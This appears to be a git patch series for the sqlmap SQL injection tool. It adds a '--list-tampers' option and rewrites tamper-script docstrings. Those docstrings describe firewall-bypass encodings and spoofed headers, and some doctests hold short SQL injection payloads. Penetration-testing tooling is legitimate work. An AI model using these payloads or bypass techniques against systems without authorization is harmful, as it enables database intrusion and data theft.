tamper/nonrecursivereplacement.py -e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py -b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py +1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py +f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py +91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py +efd1917c6ccc632f044084a30e0e0f98 tamper/nonrecursivereplacement.py +95bf07047343c68a05658f5f11c6b413 tamper/overlongutf8more.py +db4687249dedddbe057c8b163923ef01 tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -91272e566ceb4644254cd6abd613db21 tamper/plus2concat.py -265314f4b3b921f4c0d470ddaa6506e4 tamper/plus2fnconcat.py +db9cd6325d1814e5fe88323fe4add4e1 tamper/plus2concat.py +bcad55e2f7ce3e58a4cc7fcef77d4a4a tamper/plus2fnconcat.py e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py -6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py -48228322d40d97016b05e408c5234634 tamper/securesphere.py +e50d9ed1c988638899cf82f18452e96c tamper/randomcomments.py +938bfac6e55a8823e4a66cd29166d980 tamper/securesphere.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py 62d4d07b640d9d54d26ba33a77de9474 tamper/space2dash.py ab91c20f71973b1a9a5fecfb9f2a1d1f tamper/space2hash.py @@ -274,12 +274,12 @@ ad45e799126d2d563b3958f714d2e7c6 tamper/space2mssqlblank.py 74334d72bffb99b0ac092f87f4da2675 tamper/space2mssqlhash.py fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 48a1f013657186e336d249adefbdbc7b tamper/space2mysqldash.py -36958b2a5f5915de8b7cc157a64b267a tamper/space2plus.py +72a547bc3bf32dba0d1c3093988df8af tamper/space2plus.py 6ce135f89259c379d84c85e538300091 tamper/space2randomblank.py -95c91853034d9e276a6570e4d01b5f74 tamper/sp_password.py +93fc10b57586936cef05e88227c84ad0 tamper/sp_password.py 041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py 6459c62914ae643799667de8bd283c97 tamper/unionalltounion.py -3b8182b8caef857b9af397e47d0c9938 tamper/unmagicquotes.py +51d20b5cb5a50fc2e44d39087f865d23 tamper/unmagicquotes.py 371afb396f0bb18d97147c5db83354f4 tamper/uppercase.py 557ce5bf5ae9b7ab26f2c6b57312f41a tamper/varnish.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py From 1f9bf587b523391bd27f48f17f5fd6babd0c5a93 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 31 Jul 2018 02:18:33 +0200 Subject: [PATCH 220/428] Implementation for an Issue #3108 --- lib/core/common.py | 10 ++-- lib/core/option.py | 18 +++++++ lib/core/optiondict.py | 1 + lib/core/settings.py | 2 +- lib/parse/cmdline.py | 9 ++-- sqlmap.conf | 4 ++ tamper/apostrophemask.py | 2 +- tamper/apostrophenullencode.py | 2 +- tamper/appendnullbyte.py | 2 +- tamper/base64encode.py | 2 +- tamper/bluecoat.py | 3 +- tamper/chardoubleencode.py | 2 +- tamper/charencode.py | 2 +- tamper/charunicodeencode.py | 2 +- tamper/charunicodeescape.py | 2 +- tamper/ifnull2casewhenisnull.py | 2 +- tamper/ifnull2ifisnull.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/lowercase.py | 2 +- tamper/overlongutf8.py | 2 +- tamper/overlongutf8more.py | 2 +- tamper/percentage.py | 2 +- tamper/plus2concat.py | 2 +- tamper/plus2fnconcat.py | 2 +- tamper/randomcase.py | 2 +- tamper/randomcomments.py | 2 +- tamper/space2dash.py | 3 +- tamper/space2hash.py | 3 +- tamper/space2morecomment.py | 2 +- tamper/space2morehash.py | 3 +- tamper/space2mssqlblank.py | 3 +- tamper/space2mssqlhash.py | 3 +- tamper/space2mysqlblank.py | 3 +- tamper/space2mysqldash.py | 5 +- tamper/space2randomblank.py | 3 +- tamper/unionalltounion.py | 2 +- tamper/uppercase.py | 2 +- tamper/varnish.py | 8 +-- tamper/versionedkeywords.py | 2 +- tamper/versionedmorekeywords.py | 2 +- tamper/xforwardedfor.py | 3 +- txt/checksum.md5 | 80 +++++++++++++++--------------- 42 files changed, 113 insertions(+), 99 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8920ca854bc..885cdaac53d 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -868,11 +868,11 @@ def boldifyMessage(message): retVal = message if any(_ in message for _ in BOLD_PATTERNS): - retVal = setColor(message, True) + retVal = setColor(message, bold=True) return retVal -def setColor(message, bold=False): +def setColor(message, color=None, bold=False): retVal = message level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel") @@ -880,8 +880,8 @@ def setColor(message, bold=False): level = unicodeencode(level) if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler - if bold: - retVal = colored(message, color=None, on_color=None, attrs=("bold",)) + if bold or color: + retVal = colored(message, color=color, on_color=None, attrs=("bold",) if bold else None) elif level: level = getattr(logging, level, None) if isinstance(level, basestring) else level retVal = LOGGER_HANDLER.colorize(message, level) @@ -925,7 +925,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= if conf.get("api"): sys.stdout.write(message, status, content_type) else: - sys.stdout.write(setColor(message, bold)) + sys.stdout.write(setColor(message, bold=bold)) sys.stdout.flush() except IOError: diff --git a/lib/core/option.py b/lib/core/option.py index ee2d64112f7..502a7910117 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -54,6 +54,7 @@ from lib.core.common import runningAsAdmin from lib.core.common import safeExpandUser from lib.core.common import saveConfig +from lib.core.common import setColor from lib.core.common import setOptimize from lib.core.common import setPaths from lib.core.common import singleTimeWarnMessage @@ -699,6 +700,22 @@ def _setDBMS(): break +def _listTamperingFunctions(): + """ + Lists available tamper functions + """ + + if conf.listTampers: + infoMsg = "listing available tamper scripts\n" + logger.info(infoMsg) + + for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))): + content = openFile(script, "rb").read() + match = re.search(r'(?s)__priority__.+"""(.+)"""', content) + if match: + comment = match.group(1).strip() + dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip()))) + def _setTamperingFunctions(): """ Loads tampering functions from given script(s) @@ -2459,6 +2476,7 @@ def init(): _setDNSServer() _adjustLoggingFormatter() _setMultipleTargets() + _listTamperingFunctions() _setTamperingFunctions() _setWafFunctions() _setTrafficOutputFP() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index e8c25ac627e..10c5b2c8e73 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -227,6 +227,7 @@ "disableColoring": "boolean", "googlePage": "integer", "identifyWaf": "boolean", + "listTampers": "boolean", "mobile": "boolean", "offline": "boolean", "purge": "boolean", diff --git a/lib/core/settings.py b/lib/core/settings.py index 85c54fbc2ad..93ae43a1f30 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.27" +VERSION = "1.2.7.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index ab2fbe8ebb8..b255b9da138 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -637,6 +637,9 @@ def cmdLineParser(argv=None): miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", help="Make a thorough testing for a WAF/IPS/IDS protection") + miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true", + help="Display list of available tamper scripts") + miscellaneous.add_option("--mobile", dest="mobile", action="store_true", help="Imitate smartphone through HTTP User-Agent header") @@ -874,9 +877,9 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help\n" + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)): + errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). " + errMsg += "Use -h for basic and -hh for advanced help\n" parser.error(errMsg) return args diff --git a/sqlmap.conf b/sqlmap.conf index 3d70d3383d0..962651c57ff 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -778,6 +778,10 @@ googlePage = 1 # Valid: True or False identifyWaf = False +# Display list of available tamper scripts +# Valid: True or False +listTampers = False + # Imitate smartphone through HTTP User-Agent header. # Valid: True or False mobile = False diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index cc01e3f7131..231617ad64b 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its UTF-8 full width counterpart + Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87) References: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index a984d26d3cb..54fe9c80207 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its illegal double unicode counterpart + Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27) >>> tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271' diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index 662b5785745..1eaca164f1c 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Appends encoded NULL byte character (%00) at the end of payload + Appends (Access) NULL byte character (%00) at the end of payload Requirement: * Microsoft Access diff --git a/tamper/base64encode.py b/tamper/base64encode.py index d2057778b23..21ae80233fb 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -17,7 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Base64 all characters in a given payload + Base64-encodes all characters in a given payload >>> tamper("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index f0f034f39a4..5b17c0db66f 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py @@ -17,8 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character after SQL statement with a valid random blank character. - Afterwards replace character '=' with operator LIKE + Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE Requirement: * Blue Coat SGOS with WAF activated as documented in diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index 19a50bf5c7c..b1d0f8fe2b4 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double URL-encodes all characters in a given payload (not processing already encoded) + Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554) Notes: * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset diff --git a/tamper/charencode.py b/tamper/charencode.py index 37f5ff31c0a..324c4a90d8a 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - URL-encodes all characters in a given payload (not processing already encoded) + URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index 0c07a31fc39..dc1a5dca3b1 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Unicode-URL-encodes all characters in a given payload (not processing already encoded) + Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) Requirement: * ASP diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py index 380f0736b6f..28984164db6 100644 --- a/tamper/charunicodeescape.py +++ b/tamper/charunicodeescape.py @@ -13,7 +13,7 @@ def tamper(payload, **kwargs): """ - Unicode-escapes non-encoded characters in a given payload (not processing already encoded) + Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) Notes: * Useful to bypass weak filtering and/or WAFs in JSON contexes diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py index b049d858271..c9a8c0ee2fa 100644 --- a/tamper/ifnull2casewhenisnull.py +++ b/tamper/ifnull2casewhenisnull.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' + Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart Requirement: * MySQL diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py index 956629296ca..9e2531941fd 100644 --- a/tamper/ifnull2ifisnull.py +++ b/tamper/ifnull2ifisnull.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' + Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart Requirement: * MySQL diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 63a2d9aa269..24fcc7b9b9e 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -13,7 +13,7 @@ def tamper(payload, **kwargs): """ - Add a comment to the end of all occurrences of (MySQL) "information_schema" identifier + Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' diff --git a/tamper/lowercase.py b/tamper/lowercase.py index 0723edbdd8e..51a86e33563 100644 --- a/tamper/lowercase.py +++ b/tamper/lowercase.py @@ -17,7 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with lower case value + Replaces each keyword character with lower case value (e.g. SELECT -> select) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index c5321317477..3e434638328 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Converts all (non-alphanum) characters in a given payload (not processing already encoded) + Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7) Reference: * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py index 2a9ee4c14d4..a34b61929cb 100644 --- a/tamper/overlongutf8more.py +++ b/tamper/overlongutf8more.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Converts all characters in a given payload (not processing already encoded) + Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) Reference: * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ diff --git a/tamper/percentage.py b/tamper/percentage.py index 0a32661e588..182ddc52c33 100644 --- a/tamper/percentage.py +++ b/tamper/percentage.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds a percentage sign ('%') infront of each character + Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T) Requirement: * ASP diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index fa238ae9179..574a2082850 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus operator ('+') with (MsSQL) function CONCAT() + Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart Tested against: * Microsoft SQL Server 2012 diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index 273dd6462a0..86ceee621ca 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} + Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart Tested against: * Microsoft SQL Server 2008 diff --git a/tamper/randomcase.py b/tamper/randomcase.py index a5fcaf97016..9d2843154e3 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with random case value + Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index 7004134231a..9890deed3db 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -15,7 +15,7 @@ def tamper(payload, **kwargs): """ - Add random inline comments inside SQL keywords + Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT) >>> import random >>> random.seed(0) diff --git a/tamper/space2dash.py b/tamper/space2dash.py index 94cfc8d24b2..525e051a268 100644 --- a/tamper/space2dash.py +++ b/tamper/space2dash.py @@ -14,8 +14,7 @@ def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a random string and a new line ('\n') + Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') Requirement: * MSSQL diff --git a/tamper/space2hash.py b/tamper/space2hash.py index c21e3f04130..56d5e06e5eb 100644 --- a/tamper/space2hash.py +++ b/tamper/space2hash.py @@ -20,8 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py index 0fa476d5973..e3644b6d956 100644 --- a/tamper/space2morecomment.py +++ b/tamper/space2morecomment.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with comments '/**_**/' + Replaces (MySQL) instances of space character (' ') with comments '/**_**/' Tested against: * MySQL 5.0 and 5.5 diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py index aa5df6f1a5f..77169fb96d9 100644 --- a/tamper/space2morehash.py +++ b/tamper/space2morehash.py @@ -23,8 +23,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL >= 5.1.13 diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py index 8a1ba82a4d9..8424ec1ca71 100644 --- a/tamper/space2mssqlblank.py +++ b/tamper/space2mssqlblank.py @@ -19,8 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters + Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters Requirement: * Microsoft SQL Server diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py index e50a560c69a..0e489c8f2ff 100644 --- a/tamper/space2mssqlhash.py +++ b/tamper/space2mssqlhash.py @@ -11,8 +11,7 @@ def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a new line ('\n') + Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') Requirement: * MSSQL diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py index ed024252994..0216e2d6ed5 100644 --- a/tamper/space2mysqlblank.py +++ b/tamper/space2mysqlblank.py @@ -19,8 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters + Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters Requirement: * MySQL diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py index f351079028c..67e72538b47 100644 --- a/tamper/space2mysqldash.py +++ b/tamper/space2mysqldash.py @@ -18,15 +18,12 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a new line ('\n') + Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') Requirement: * MySQL * MSSQL - Tested against: - Notes: * Useful to bypass several web application firewalls. diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index c61a3a3f4dc..0234b65caed 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters + Replaces space character (' ') with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py index f5d759412e4..46e00447eb4 100644 --- a/tamper/unionalltounion.py +++ b/tamper/unionalltounion.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces UNION ALL SELECT with UNION SELECT + Replaces instances of UNION ALL SELECT with UNION SELECT counterpart >>> tamper('-1 UNION ALL SELECT') '-1 UNION SELECT' diff --git a/tamper/uppercase.py b/tamper/uppercase.py index 64382c4e122..71aeba794cf 100644 --- a/tamper/uppercase.py +++ b/tamper/uppercase.py @@ -17,7 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with upper case value + Replaces each keyword character with upper case value (e.g. select -> SELECT) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/varnish.py b/tamper/varnish.py index fdc6fb09bad..b0b020e7ebd 100644 --- a/tamper/varnish.py +++ b/tamper/varnish.py @@ -14,12 +14,12 @@ def dependencies(): def tamper(payload, **kwargs): """ - Append a HTTP header 'X-originating-IP' to bypass - WAF Protection of Varnish Firewall + Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall - Notes: - Reference: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 + Reference: + * http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 + Notes: Examples: >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X) >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X) diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py index 920d88d18fc..31524e60855 100644 --- a/tamper/versionedkeywords.py +++ b/tamper/versionedkeywords.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each non-function keyword with versioned MySQL comment + Encloses each non-function keyword with (MySQL) versioned comment Requirement: * MySQL diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py index 1fe5adf5636..d8480814724 100644 --- a/tamper/versionedmorekeywords.py +++ b/tamper/versionedmorekeywords.py @@ -21,7 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each keyword with versioned MySQL comment + Encloses each keyword with (MySQL) versioned comment Requirement: * MySQL >= 5.1.13 diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index 4374a4862b1..6cd5c81131b 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -20,8 +20,7 @@ def randomIP(): def tamper(payload, **kwargs): """ - Append a fake HTTP header 'X-Forwarded-For' to bypass - WAF (usually application based) protection + Append a fake HTTP header 'X-Forwarded-For' """ headers = kwargs.get("headers", {}) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 27f9d2297b4..65185f6f709 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -af0c5caaa6328319a682073afa93ec84 lib/core/common.py +ee1b800e860263b877a2b292a3e4becd lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -40,15 +40,15 @@ ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py -c82dee0f62e729213b92f5ec85f74b70 lib/core/option.py +05f72baa2db4073bb0273d7fc1df13eb lib/core/optiondict.py +8e759d4c8711a5980d4bdc2d044a4fd4 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ec2adffae2982c11332c573fe4e68d6d lib/core/settings.py +b0c61c78049b4e342aeafd2fc85430fe lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -59,7 +59,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -bc34167c7accc61df07b2982cddd0338 lib/parse/cmdline.py +babf5c48bc6a3797fc459706af4465cd lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -228,16 +228,16 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py a35b5b83c12841fdf3925190c9d24299 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py -4e6956958ef8135cd543d7a57f2e73ff tamper/apostrophemask.py -7c838eadd96b20800ba0bd394f5014f0 tamper/apostrophenullencode.py -0d7e8a3a0e17c92d51c49415884a47c9 tamper/appendnullbyte.py -0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py +3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py +d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py +a14420ef43cdeb8fbc091116d31d31f1 tamper/appendnullbyte.py +cfe19908ec32e3f2e113e759705f986b tamper/base64encode.py e77a89b2af931a1820f6ba4b86d19cd4 tamper/between.py -e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py -1807417f8a7fc0bb30c36ead458da0c8 tamper/chardoubleencode.py -043c97c7b214335838a6bb15eeedcba3 tamper/charencode.py -0c0d0e5d0caf4258a75112ab59fa3e75 tamper/charunicodeencode.py -18b2ca09390686f895c3bbd6460ac034 tamper/charunicodeescape.py +9df0a1810a27b92eec1375d19a95b7ef tamper/bluecoat.py +8c174b8925f4f075010b04d85c02a169 tamper/chardoubleencode.py +45174c61533f464806f4454be6a3f2d6 tamper/charencode.py +0aadf3e93dd72a9b94cb6532b3343dd1 tamper/charunicodeencode.py +014f352771f0c1fb9e0f5397c5a03dc3 tamper/charunicodeescape.py 6c618b9310ed5c8de93c927e920b1d31 tamper/commalesslimit.py 50f6532870d2e109bf46468e8d3ded49 tamper/commalessmid.py 4951fec0a1af043e4b9c0728882d3452 tamper/commentbeforeparentheses.py @@ -247,44 +247,44 @@ e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py 6124bc647bfa04f2b16ff8cad98382d4 tamper/halfversionedmorekeywords.py ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py -3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py -e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -4615cbeff722583e7ab3dbe774e38c93 tamper/informationschemacomment.py +42f232d776065e325e862867c522c523 